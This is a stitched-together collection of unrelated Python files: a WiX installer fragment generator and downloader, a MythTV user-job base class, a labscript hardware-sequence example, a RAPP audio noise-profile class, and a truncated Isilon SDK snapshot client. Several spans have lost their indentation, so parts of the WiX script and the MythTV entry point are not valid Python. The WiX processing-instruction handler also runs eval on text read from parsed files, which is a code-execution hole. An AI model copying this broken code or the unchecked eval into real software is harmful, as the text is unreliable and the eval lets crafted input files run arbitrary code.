        self._target.start(ElementTree.Comment, {})
        self._target.data(data)
        self._target.end(ElementTree.Comment)
def _adjacent_file(file):
import os.path
return os.path.join(os.path.dirname(os.path.abspath(__file__)), file)
#http://effbot.org/zone/element-lib.htm#prettyprint
def _indent(elem, level=0):
i = "\n" + level*" "
if len(elem):
if not elem.text or not elem.text.strip():
elem.text = i + " "
if not elem.tail or not elem.tail.strip():
elem.tail = i
for elem in elem:
_indent(elem, level+1)
if not elem.tail or not elem.tail.strip():
elem.tail = i
else:
if level and (not elem.tail or not elem.tail.strip()):
elem.tail = i
def gen_dir_from_vc(src, output_filename=None, id=None, diskId=None, file_map={}):
    """Generate a WiX .wxi fragment for the version-controlled files under *src*.

    Only files listed by ``git ls-files`` are included. NOTE(review): the
    mutable default ``file_map={}`` is read-only here, but confirm callers
    never mutate it. A mapping value of None drops the file; any other value
    substitutes the source path.
    """
    while src[-1] in ('/', '\\'):
        src = src[:-1]
    name = os.path.basename(src)
    id = id or name.replace('-', '_').replace(' ', '_')
    output_filename = output_filename or _adjacent_file(id + ".wxi")
    ElementTree.register_namespace("", "http://schemas.microsoft.com/wix/2006/wi")
    wix = ElementTree.Element("{http://schemas.microsoft.com/wix/2006/wi}Wix")
    SubElement = ElementTree.SubElement
    fragment = SubElement(wix, "Fragment")
    root_dir = SubElement(fragment, "DirectoryRef")
    root_dir.set("Id", id)
    component_group = SubElement(fragment, "ComponentGroup")
    component_group.set("Id", id)
    dirs = {}
    def get_dir(dirname):
        # Lazily create (and memoize) the Directory element chain for dirname.
        if dirname == src:
            return root_dir
        dir_ = dirs.get(dirname)
        if dir_ is None:
            parent = get_dir(os.path.dirname(dirname))
            dir_ = SubElement(parent, 'Directory')
            dir_.set('Name', os.path.basename(dirname))
            # "Identifiers may contain ASCII characters A-Z, a-z, digits, underscores (_), or periods (.)"
            dir_.set('Id', 'dir_' + re.sub('[^A-Za-z0-9_]', '_', os.path.relpath(dirname, '..').replace('\\', '_').replace('.', '_').replace('-', '_')))
            # "Standard identifiers are 72 characters long or less."
            if len(dir_.attrib['Id']) > 72:
                dir_.set('Id', 'dir_' + hashlib.md5(dirname).hexdigest())
            dirs[dirname] = dir_
        return dir_
    import subprocess
    # git ls-files should show files to-be-added too
    svn_status = subprocess.Popen('git ls-files'.split() + [src], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    out, err = svn_status.communicate()
    exit_code = svn_status.poll()
    if exit_code != 0:
        raise Exception('svn status failed: ' + err)
    for filename in (line.replace("/", "\\") for line in out.splitlines()):
        # print filename
        if filename == src or os.path.isdir(filename):
            continue
        dir_ = get_dir(os.path.dirname(filename))
        # -1 is the "not mapped" sentinel; None means "exclude this file".
        mapped_filename = file_map.get(os.path.normpath(filename), -1)
        if mapped_filename is None:
            continue
        elif mapped_filename != -1:
            filename = mapped_filename
        component = SubElement(component_group, 'Component')
        component.set('Directory', dir_.attrib['Id'])
        component.set('Id', 'cmp_' + hashlib.md5(filename).hexdigest())
        file_ = SubElement(component, 'File')
        file_.set('Source', filename)
        file_.set('Id', get_file_id(filename))
        if diskId:
            component.attrib['DiskId'] = diskId
    _indent(wix)
    ElementTree.ElementTree(wix).write(output_filename, xml_declaration=True, encoding='utf-8')
def get_file_id(filename):
    """Return the stable WiX File/@Id for *filename* (md5-based)."""
    digest = hashlib.md5(filename).hexdigest()
    return 'fil_' + digest
def download_file(url, filename):
    """Download *url* to *filename* unless it already exists.

    Creates parent directories as needed, streams the payload to a temporary
    file, verifies Content-Length, then renames into place. Prints the SHA1
    of the payload (wix bootstrapper uses SHA1).
    """
    if os.path.isfile(filename):
        return
    print('Downloading {} => {}'.format(url, filename))
    if os.path.dirname(filename):
        try:
            os.makedirs(os.path.dirname(filename))
        except OSError as e:
            if e.errno != errno.EEXIST:
                raise
    r = requests.get(url, stream=True)
    r.raise_for_status()
    # Create the temp file in the destination directory: the default system
    # temp dir may be on a different filesystem, where os.rename would fail
    # with EXDEV.
    fd, tmp_path = tempfile.mkstemp(dir=os.path.dirname(filename) or '.')
    # wix bootstrapper uses SHA1
    hash = hashlib.sha1()
    with os.fdopen(fd, 'wb') as f:
        for chunk in r.iter_content(chunk_size=1024):
            if chunk:  # filter out keep-alive new chunks
                hash.update(chunk)
                f.write(chunk)
    # n.b. don't use f.tell(), since it will be wrong for Content-Encoding: gzip
    # NOTE(review): _fp_bytes_read is a private urllib3 attribute — confirm
    # it still exists when upgrading requests/urllib3.
    downloaded_octets = r.raw._fp_bytes_read
    if int(r.headers.get('content-length', downloaded_octets)) != downloaded_octets:
        os.unlink(tmp_path)
        raise ValueError('Download of {} was truncated: {}/{} bytes'.format(
            url, downloaded_octets, r.headers['content-length']))
    else:
        os.rename(tmp_path, filename)
    print(' => {} {}'.format(filename, hash.hexdigest()))
class WixProcessingInstructionHandler(ContentHandler):
    """SAX handler that collects <?define name=value?> values from WiX sources."""

    def __init__(self):
        ContentHandler.__init__(self)
        self.defines = {}

    def processingInstruction(self, target, data):
        if target == 'define':
            # Each <?define name=value?> is executed as Python, binding the
            # result into self.defines.
            eval(compile(data, '<string>', 'exec'), globals(), self.defines)
        elif target == 'include':
            pass  # TODO
def download_bundle_deps(bundle_wxs):
    """Download every package referenced via DownloadUrl in *bundle_wxs*.

    NOTE(review): in addition to *bundle_wxs*, the hard-coded files
    bundle_defines.xml and META_bundle_x64.wxs are parsed for <?define?>
    values — confirm this is intended for other bundles.
    """
    defines = WixProcessingInstructionHandler()
    xml.sax.parse("bundle_defines.xml", defines)
    xml.sax.parse("META_bundle_x64.wxs", defines)
    def eval_vars(attr):
        # Expand WiX $(var.NAME) references using the collected defines.
        for name, val in defines.defines.iteritems():
            attr = attr.replace('$(var.{})'.format(name), str(val))
        return attr
    tree = ElementTree.parse(bundle_wxs, parser=CommentedTreeBuilder()).getroot()
    ElementTree.register_namespace("", "http://schemas.microsoft.com/wix/2006/wi")
    for package in itertools.chain(tree.findall(".//{http://schemas.microsoft.com/wix/2006/wi}ExePackage"),
            tree.findall(".//{http://schemas.microsoft.com/wix/2006/wi}MsuPackage"),
            tree.findall(".//{http://schemas.microsoft.com/wix/2006/wi}MsiPackage")):
        url = eval_vars(package.get('DownloadUrl', ''))
        if not url:
            continue
        filename = eval_vars(package.get('SourceFile', '') or package.get('Name', ''))
        download_file(url, filename)
    # from https://github.com/wixtoolset/wix3/blob/develop/src/ext/NetFxExtension/wixlib/NetFx4.5.wxs
    download_file('http://go.microsoft.com/fwlink/?LinkId=225704', 'redist\\dotNetFx45_Full_setup.exe')
def main(src, output_filename=None, id=None, diskId=None):
    """Harvest directory *src* with WiX `heat` and post-process the fragment.

    Post-processing removes VCS/OS junk files (.svn, Thumbs.db, desktop.ini,
    .DS_Store, *.pyc) and optionally stamps every Component with *diskId*.
    """
    add_wix_to_path()
    while src[-1] in ('/', '\\'):
        src = src[:-1]
    name = os.path.basename(src)
    id = id or name.replace('-', '_').replace(' ', '_')
    output_filename = output_filename or _adjacent_file(id + ".wxi")
    import subprocess
    def check_call(args):
        # Echo the command before running it (aids build-log debugging).
        print " ".join(args)
        subprocess.check_call(args)
    #subprocess.check_call('set path'.split(), shell=True)
    #subprocess.check_call('where heat'.split(), shell=True)
    check_call(['heat', 'dir', _adjacent_file(src), '-template', 'fragment', '-sreg', '-scom',
        '-o', output_filename, '-ag', '-cg', id, '-srd', '-var', 'var.' + id, '-dr', id, '-nologo'])
    ElementTree.register_namespace("", "http://schemas.microsoft.com/wix/2006/wi")
    tree = ElementTree.parse(output_filename, parser=CommentedTreeBuilder()).getroot()
    tree.insert(0, ElementTree.Comment('generated with gen_dir_wxi.py %s\n' % src))
    tree.insert(0, ElementTree.ProcessingInstruction('define', '%s=%s' % (id, os.path.normpath(src))))
    # child -> parent lookup, needed because ElementTree has no parent links.
    parent_map = dict((c, p) for p in tree.getiterator() for c in p)
    for file in tree.findall(".//{http://schemas.microsoft.com/wix/2006/wi}Component/{http://schemas.microsoft.com/wix/2006/wi}File"):
        file_Source = file.get('Source', '')
        if file_Source.find('.svn') != -1 or os.path.basename(file_Source) in ('Thumbs.db', 'desktop.ini', '.DS_Store') or file_Source.endswith('.pyc'):
            # Drop the whole Component that owns this junk File.
            comp = parent_map[file]
            parent_map[comp].remove(comp)
    for dir in tree.findall(".//{http://schemas.microsoft.com/wix/2006/wi}Directory"):
        if dir.get('Name', '') == '.svn':
            for dirref in tree.findall(".//{http://schemas.microsoft.com/wix/2006/wi}DirectoryRef"):
                if dirref.get('Id', '') == dir.get('Id', ''):
                    frag = parent_map[dirref]
                    parent_map[frag].remove(frag)
            parent_map[dir].remove(dir)
    if diskId:
        for component in tree.findall(".//{http://schemas.microsoft.com/wix/2006/wi}Component"):
            component.attrib['DiskId'] = diskId
    ElementTree.ElementTree(tree).write(output_filename, xml_declaration=True, encoding='utf-8')
if __name__=='__main__':
    # CLI entry point: generate a .wxi fragment for the directory in argv[1].
    main(sys.argv[1])
    # download_bundle_deps("META_bundle_x64.wxs")
#heat dir ../runtime/MATLAB/Scenario-matlab-library -template fragment -o Scenario-matlab-library.wxi -gg -cg Scenario_matlab_library -srd -var var.Scenario_matlab_library -dr Scenario_matlab_library
| StarcoderdataPython |
11301757 | #!/usr/bin/env python
"""
Provides user job base class to be used to build user job scripts.
db = MythDB()
j = Job(2353)
Recorded((j.get('chanid'),j.get('starttime')))
"""
from MythTV import MythDB
from MythTV import Job
from MythTV import Recorded
from argparse import ArgumentParser
class UserJob(object):
    """
    Base class for MythTV user job scripts.

    Parses the %JOBID% argument, loads the corresponding Job and Recorded
    records, and maps Job commands (run/pause/resume/stop/restart) to
    overridable methods via self.action_map.

    When subclassing, always call super(SubClassName, self).method() early
    in any overridden methods.
    """
    def __init__(self):
        """
        Initializes the UserJob object
        """
        super(UserJob, self).__init__()
        # jobid: MythTV job identifier (int); job/recorded: MythTV bindings
        # objects, populated by parse_args().
        self.jobid = None
        self.job = None
        self.recorded = None
        self.init_parser()
        self.build_action_map()
    def init_parser(self):
        """
        Initializes the ArgumentParser
        """
        self.parser = ArgumentParser()
        self.parser.add_argument("jobid", type=int, help="MythTV user job identifier (%%JOBID%%)")
    def parse_args(self):
        """
        Parse the command line, then load the Job and its Recorded record.
        """
        self.args = self.parser.parse_args()
        self.jobid = self.args.jobid
        self.job = Job(self.jobid)
        self.verify_job()
        self.recorded = Recorded((self.job.chanid,self.job.starttime))
    def verify_job(self):
        """
        Check that the job is a USERJOB.

        NOTE(review): currently only prints a warning and continues — confirm
        whether this should abort instead.
        """
        if not(self.job.type & Job.USERJOB):
            print "not a user job"
    def perform(self):
        """
        Entry point: parse arguments and load job state.

        NOTE(review): does not dispatch through self.action_map — subclasses
        appear responsible for invoking the appropriate action.
        """
        self.parse_args()
    def start(self):
        """
        Mark the job as starting.
        """
        self.job.setStatus(Job.STARTING)
    def run(self):
        """
        Start the job and mark it as running.
        """
        self.start()
        self.job.setStatus(Job.RUNNING)
    def pause(self):
        """
        Mark the job as paused.
        """
        self.job.setStatus(Job.PAUSED)
    def resume(self):
        """
        Mark the job as running again after a pause.
        """
        self.job.setStatus(Job.RUNNING)
    def stop(self):
        """
        Mark the job as stopping.
        """
        self.job.setStatus(Job.STOPPING)
    def restart(self):
        """
        Stop the job, then run it again.
        """
        self.stop()
        self.run()
    def build_action_map(self):
        """
        Map MythTV Job command constants to the corresponding methods.
        """
        self.action_map = {
            Job.RUN:self.run,
            Job.PAUSE:self.pause,
            Job.RESUME:self.resume,
            Job.STOP:self.stop,
            Job.RESTART:self.restart }
if __name__ == "__main__":
UserJob().perform()
| StarcoderdataPython |
11205082 | <reponame>labscript-suite-temp-2-archive/zachglassman-labscript--forked-from--labscript_suite-labscript
#####################################################################
# #
# /example.py #
# #
# Copyright 2013, Monash University #
# #
# This file is part of the program labscript, in the labscript #
# suite (see http://labscriptsuite.org), and is licensed under the #
# Simplified BSD License. See the license.txt file in the root of #
# the project for the full license. #
# #
#####################################################################
import __init__ # only have to do this because we're inside the labscript directory
from labscript import *
from labscript_devices.PulseBlaster import PulseBlaster
from labscript_devices.NI_PCIe_6363 import NI_PCIe_6363
from labscript_devices.NovaTechDDS9M import NovaTechDDS9M
from labscript_devices.Camera import Camera
from labscript_devices.PineBlaster import PineBlaster
from labscript_devices.NI_PCI_6733 import NI_PCI_6733
from labscript_utils.unitconversions import *
# testing
# --- Connection table: pseudoclocks, cards and channels -------------------
PulseBlaster(name='pulseblaster_0', board_number=0)
ClockLine(name='pulseblaster_0_clockline_fast', pseudoclock=pulseblaster_0.pseudoclock, connection='flag 0')
ClockLine(name='pulseblaster_0_clockline_slow', pseudoclock=pulseblaster_0.pseudoclock, connection='flag 1')
NI_PCIe_6363(name='ni_card_0', parent_device=pulseblaster_0_clockline_fast, clock_terminal='ni_pcie_6363_0/PFI0', MAX_name='ni_pcie_6363_0', acquisition_rate=100e3)
NovaTechDDS9M(name='novatechdds9m_0', parent_device=pulseblaster_0_clockline_slow, com_port="com10")
# Create a BIAS Camera, tirggered to take photos with flag 3 of pulseblaster_0
Camera('andor_ixon_0', pulseblaster_0.direct_outputs, 'flag 3', BIAS_port = 42520, serial_number="0000", SDK="IMAQdx", effective_pixel_size=4.6e-6, exposure_time=.1, orientation='top')
# A second pseudoclock to just clock a NI_PCI_6733 Card
PineBlaster(name='pineblaster_0', trigger_device=ni_card_0, trigger_connection='port0/line15', usbport='COM7')
NI_PCI_6733(name='ni_card_1', parent_device=pineblaster_0.clockline, clock_terminal='ni_pcie_6733_0/PFI0', MAX_name='ni_pci_6733_0')
# Create the output/input channels on the above devices
AnalogOut( 'analog0', ni_card_1, 'ao0', unit_conversion_class=example1) # use the example1 conversion class located in pythonlib/unitconversions/example.py with default paremeters
# same as above, but we are changing some parameters used in the conversion and specifying a prefix to be used with units. You can now program in mA, uA, mGauss, uGauss
AnalogOut( 'analog1', ni_card_1, 'ao1', unit_conversion_class=example1, unit_conversion_parameters={'a':5, 'b':1, 'magnitudes':['m','u']})
AnalogOut( 'analog2', ni_card_0, 'ao2')
AnalogIn( 'input1', ni_card_0, 'ai0')
Shutter( 'shutter1', ni_card_0, 'port0/line1', delay=(0,0))
Shutter( 'shutter2', pulseblaster_0.direct_outputs, 'flag 2', delay=(0,0))
DigitalOut( 'switch', pulseblaster_0.direct_outputs, 'flag 4')
DDS( 'dds1', novatechdds9m_0, 'channel 0')
DDS( 'dds2', novatechdds9m_0, 'channel 1')
StaticDDS( 'dds5', novatechdds9m_0, 'channel 2')
# The next DDS is special because it has the frequency and amplitude calibrated using example2 and example3 classes from pythonlib/unitconversions/example.py
DDS( 'dds3', pulseblaster_0.direct_outputs, 'dds 0', freq_conv_class=example2, freq_conv_params={'a':4, 'b':6}, amp_conv_class=example3, amp_conv_params={'a':2, 'b':22, 'magnitudes':['m']})
DDS( 'dds4', pulseblaster_0.direct_outputs, 'dds 1')
# This sets up the inputs/counters/etc that will monitor
# The first paremeter is the name for the WaitMonitor device
# The second and third paremeters are the device and channel respectively that goes high when a wait begins and low when it ends. This output should be
# physically connected to a counter specified in the next two paremeters.
# The final two paremeters specify the device/channel that is to trigger the pseudoclock if the WAIT instruction hits the specified timeout. The output of
# this channel should be physicaly connect to the external trigger of the master pseudoclock.
WaitMonitor('wait_monitor', ni_card_0, 'port0/line0', ni_card_0, 'ctr0', ni_card_0, 'pfi1')
# A variable to define the acquisition rate used for the analog outputs below.
# This is just here to show you that you can use variables instead of typing in numbers!
# Furthermore, these variables could be defined within runmanager (rather than in the code like this one is)
# for easy manipulation via a graphical interface.
rate = 1e4
# The time (in seconds) we wish the pineblaster pseudoclock to start after
# the master pseudoclock (the pulseblaster)
pineblaster_0.set_initial_trigger_time(1)
# --- Experiment sequence ---------------------------------------------------
# Start the experiment!
start()
# A variable to keep track of time
t = 0
# Analog Acquisitions are acquired at the sample rate specified when the *device* is instantiated (eg NI_PCIE_6363() above)
# Acquire an analog trace on this channel from t=0s to t=1s
input1.acquire('measurement1', 0, 1)
# Acquire an analog trace on this channel from t=3s to t=5s
input1.acquire('measurement2', 3, 5)
# Acquire an analog trace on this channel from t=7s to t=9s
input1.acquire('measurement3', 7, 9)
# Set some initial values (t=0) for DDS 1
dds1.setamp(t, 0.5)
dds1.setfreq(t, 0.6)
dds1.setphase(t, 0.7)
# Set some values for dds2 at t=1s. They will have value '0' before this
# time unless otherwise set
dds2.setamp(t+1, 0.9)
dds2.setfreq(t+1, 1.0)
dds2.setphase(t+1, 1.1)
# dds5 is a "static" DDS. This means its value can only be set once, and
# will be set just before the experiment begins
dds5.setfreq(90*MHz)
dds5.setamp(1)
dds5.setphase(0)
# Have the shutters start in the closed state (t=0)
shutter1.close(t)
shutter2.close(t)
# Analog0 is attached to ni_card_1, which is an NI-pci_6733 card (MAX name ni_pcie_6733_0) clocked by a pineblaster
# The pineblaster is being triggered to start by a pulseblaster, which introduces a delay into the start of output from the NI card
# This is all handled by labscript, and you still specify times from the beginning of the experiment (when the master pseudoclock is started)
# YOU DO NOT HAVE TO TAKE INTO ACCOUNT THE DELAY YOURSELF!!
# You do however need to make sure you do not command output from this device before the device has actually started.
# To do so, make sure no commands happen on this channel before analog0.t0
# (this variable contains the delay time!)
analog0.constant(analog0.t0, 2)
# Set this channel to a constant value
# As this channel is clocked by the master pseudoclock, you can command
# output from t=0
analog2.constant(t, 3)
# Again, this must not start until analog1.t0 or later!
analog1.sine(analog1.t0, duration=6, amplitude=5, angfreq=2*pi,
             phase=0, dc_offset=0.0, samplerate=rate)
# Let's increment our time variable!
t += max(1, analog0.t0)
# Open the shutter, enable the DDS, ramp an analog output!
shutter2.open(t)
dds3.enable(t)
analog0.ramp(t, duration=2, initial=2, final=3, samplerate=rate)
# Take a picture
andor_ixon_0.expose('exposure_1', t, 'flat')
andor_ixon_0.expose('exposure_1', t+1, 'atoms')
# Do some more things at various times!
# (these are ignoring the t variable)
def my_ramp(t, *args, **kwargs):
    # Wraps the labscript sine_ramp function factory so it can be evaluated
    # at a single time t.
    lambda_func = functions.sine_ramp(*args, **kwargs)
    return lambda_func(t)
analog2.sine_ramp(t=2.25, duration=3, initial=3, final=4,
                  samplerate=rate, truncation=0.7)
shutter1.open(t=5.89)
analog2.constant(t=5.9, value=5)
analog2.constant(t=7, value=4)
analog2.constant(t=8, value=5)
t += 9 # set t=10 seconds
# Wait for an external trigger on the master pseudoclock
# Waits must be names
# The timeout defaults to 5s, unless otherwise specified.
# The timeout specifies how long to wait without seeing the external
# trigger before continuing the experiment
t += wait('my_first_wait', t=t, timeout=2)
# Waits take very little time as far as labscript is concerned. They only add on the retirggering time needed to start devices up and get them all in sync again.
# After a wait, labscript time (the t variable here) and execution time (when the hardware instructions are executed on the hardware) will not be the same
# as the wait instruction may take anywhere from 0 to "timeout" seconds,
# and this number is only determined during execution time.
t += 1
# Do something 1s after the wait!
switch.go_high(t)
# Examples programming in different units as specified in the
# unitconversion classes passed as parameters to the channel definition
analog0.constant(t, value=5, units='A')
analog1.constant(t, value=1000, units='mGauss')
dds3.setfreq(t, value=50, units='detuned_MHz')
dds3.setamp(t, value=1.9, units='W')
t += 2
analog0.ramp(t, duration=1, initial=5, final=7, samplerate=rate, units='Gauss')
analog1.constant(t, value=3e6, units='uA')
dds3.setfreq(t, value=60, units='detuned_MHz')
dds3.setamp(t, value=500, units='mW')
t += 2
# Stop at t=15 seconds, note that because of the wait timeout, this might
# be as late as 17s (Plus a little bit of retriggering time) in execution
# time
stop(t)
| StarcoderdataPython |
72954 | #!/usr/bin/env python
# -*- encode: utf-8 -*-
#Copyright 2015 RAPP
#Licensed under the Apache License, Version 2.0 (the "License");
#you may not use this file except in compliance with the License.
#You may obtain a copy of the License at
#http://www.apache.org/licenses/LICENSE-2.0
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
# Authors: <NAME>
# contact: <EMAIL>
import os
import subprocess
import sys
import time

from scipy.io import wavfile

from rapp_utilities import Utilities
## @class SetNoiseProfile
# Evaluates the noise profile for an audio file
class SetNoiseProfile:

    ## Performs initializations
    def __init__(self):
        self.utilities = Utilities()

    ## Create *directory* (if missing) and make it world-accessible.
    #
    # @param directory [string] Directory path to create
    # @return None on success, otherwise an error string
    def _setup_shared_dir(self, directory):
        if not os.path.isdir(directory):
            os.makedirs(directory)
            try:
                # os.chmod instead of `os.system("chmod 777 ...")`: no shell
                # is involved, so the path cannot be misinterpreted.
                os.chmod(directory, 0o777)
            except OSError:
                return "Error: Server chmod malfunctioned"
        return None

    ## Evaluates the audio profile
    #
    # Handles service callback
    # rapp_audio_processing.AudioProcessing#setNoiseProfileCallback
    #
    # External tools are invoked with argv lists (shell=False) so that
    # user-supplied paths cannot inject shell commands.
    #
    # @param user [string] The system user, for environmental variable access
    # @param noise_audio_file [string] Noise audio file path
    # @param audio_file_type [string] Noise audio file's type
    # @return "true" on success, otherwise an error description string
    def setNoise_profile(self, user, noise_audio_file, audio_file_type):
        cleanup = []
        directory = os.path.expanduser(
            "~/rapp_platform_files/audio_processing/") + user
        error = self._setup_shared_dir(directory)
        if error:
            return error
        directory += "/noise_profile/"
        error = self._setup_shared_dir(directory)
        if error:
            return error

        new_audio = noise_audio_file
        if not os.path.isfile(new_audio):
            return "Error: The audio file does not exist"

        # Making audio compatible to sphinx4
        if audio_file_type == 'nao_ogg':
            if ".ogg" not in new_audio:
                return "Error: ogg type selected but file is of another type"
            new_audio += ".wav"
            if subprocess.call(["sox", noise_audio_file, new_audio]) != 0:
                return "Error: Server sox malfunctioned"
            cleanup.append(new_audio)
        elif audio_file_type == "nao_wav_1_ch":
            if ".wav" not in new_audio:
                return "Error: wav type 1 channel selected but file is of another type"
            samp_freq, signal = wavfile.read(new_audio)
            if len(signal.shape) != 1:
                return "Error: wav 1 ch declared but the audio file has " +\
                    str(signal.shape[1]) + ' channels'
        elif audio_file_type == "nao_wav_4_ch":
            if ".wav" not in new_audio:
                return "Error: wav type 4 channels selected but file is of another type"
            samp_freq, signal = wavfile.read(new_audio)
            if len(signal.shape) != 2 or signal.shape[1] != 4:
                return "Error: wav 4 ch declared but the audio file has not 4 channels"
            # Downmix to mono / 16 kHz for sphinx4 compatibility.
            new_audio += "_1ch.wav"
            if subprocess.call(["sox", noise_audio_file, "-c", "1",
                                "-r", "16000", new_audio]) != 0:
                return "Error: Server sox malfunctioned"
            cleanup.append(new_audio)
        else:
            success = "Non valid noise audio type"
            status = self.utilities.cleanup(cleanup)
            if status != True:
                success += " " + status
            return success

        noise_profile_uri = directory + "/noise_profile_" + audio_file_type
        # Extract the noise profile from a 2.5 s window starting at 0.5 s.
        if subprocess.call(["sox", new_audio, "-t", "null", "/dev/null",
                            "trim", "0.5", "2.5", "noiseprof",
                            noise_profile_uri]) != 0:
            return "Error: Server sox malfunctioned"
        try:
            os.chmod(noise_profile_uri, 0o777)
        except OSError:
            return "Error: Server chmod malfunctioned"
        status = self.utilities.cleanup(cleanup)
        if status != True:
            return status
        return "true"
| StarcoderdataPython |
6435671 | # coding: utf-8
"""
Isilon SDK
Isilon SDK - Language bindings for the OneFS API # noqa: E501
OpenAPI spec version: 6
Contact: <EMAIL>
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from isi_sdk_8_1_1.api_client import ApiClient
class SnapshotApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_snapshot_alias(self, snapshot_alias, **kwargs): # noqa: E501
"""create_snapshot_alias # noqa: E501
Create a new snapshot alias. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_snapshot_alias(snapshot_alias, async_req=True)
>>> result = thread.get()
:param async_req bool
:param SnapshotAliasCreateParams snapshot_alias: (required)
:return: CreateSnapshotAliasResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_snapshot_alias_with_http_info(snapshot_alias, **kwargs) # noqa: E501
else:
(data) = self.create_snapshot_alias_with_http_info(snapshot_alias, **kwargs) # noqa: E501
return data
def create_snapshot_alias_with_http_info(self, snapshot_alias, **kwargs): # noqa: E501
"""create_snapshot_alias # noqa: E501
Create a new snapshot alias. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_snapshot_alias_with_http_info(snapshot_alias, async_req=True)
>>> result = thread.get()
:param async_req bool
:param SnapshotAliasCreateParams snapshot_alias: (required)
:return: CreateSnapshotAliasResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['snapshot_alias'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_snapshot_alias" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'snapshot_alias' is set
if ('snapshot_alias' not in params or
params['snapshot_alias'] is None):
raise ValueError("Missing the required parameter `snapshot_alias` when calling `create_snapshot_alias`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'snapshot_alias' in params:
body_params = params['snapshot_alias']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/1/snapshot/aliases', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CreateSnapshotAliasResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_snapshot_changelist(self, snapshot_changelist, **kwargs): # noqa: E501
"""create_snapshot_changelist # noqa: E501
Create a new changelist. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_snapshot_changelist(snapshot_changelist, async_req=True)
>>> result = thread.get()
:param async_req bool
:param SnapshotChangelists snapshot_changelist: (required)
:return: CreateSnapshotChangelistResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_snapshot_changelist_with_http_info(snapshot_changelist, **kwargs) # noqa: E501
else:
(data) = self.create_snapshot_changelist_with_http_info(snapshot_changelist, **kwargs) # noqa: E501
return data
def create_snapshot_changelist_with_http_info(self, snapshot_changelist, **kwargs): # noqa: E501
"""create_snapshot_changelist # noqa: E501
Create a new changelist. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_snapshot_changelist_with_http_info(snapshot_changelist, async_req=True)
>>> result = thread.get()
:param async_req bool
:param SnapshotChangelists snapshot_changelist: (required)
:return: CreateSnapshotChangelistResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['snapshot_changelist'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_snapshot_changelist" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'snapshot_changelist' is set
if ('snapshot_changelist' not in params or
params['snapshot_changelist'] is None):
raise ValueError("Missing the required parameter `snapshot_changelist` when calling `create_snapshot_changelist`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'snapshot_changelist' in params:
body_params = params['snapshot_changelist']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/1/snapshot/changelists', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CreateSnapshotChangelistResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_snapshot_repstate(self, snapshot_repstate, **kwargs): # noqa: E501
"""create_snapshot_repstate # noqa: E501
Create a new repstates. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_snapshot_repstate(snapshot_repstate, async_req=True)
>>> result = thread.get()
:param async_req bool
:param SnapshotRepstates snapshot_repstate: (required)
:return: CreateSnapshotRepstateResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_snapshot_repstate_with_http_info(snapshot_repstate, **kwargs) # noqa: E501
else:
(data) = self.create_snapshot_repstate_with_http_info(snapshot_repstate, **kwargs) # noqa: E501
return data
def create_snapshot_repstate_with_http_info(self, snapshot_repstate, **kwargs): # noqa: E501
"""create_snapshot_repstate # noqa: E501
Create a new repstates. # noqa: E501
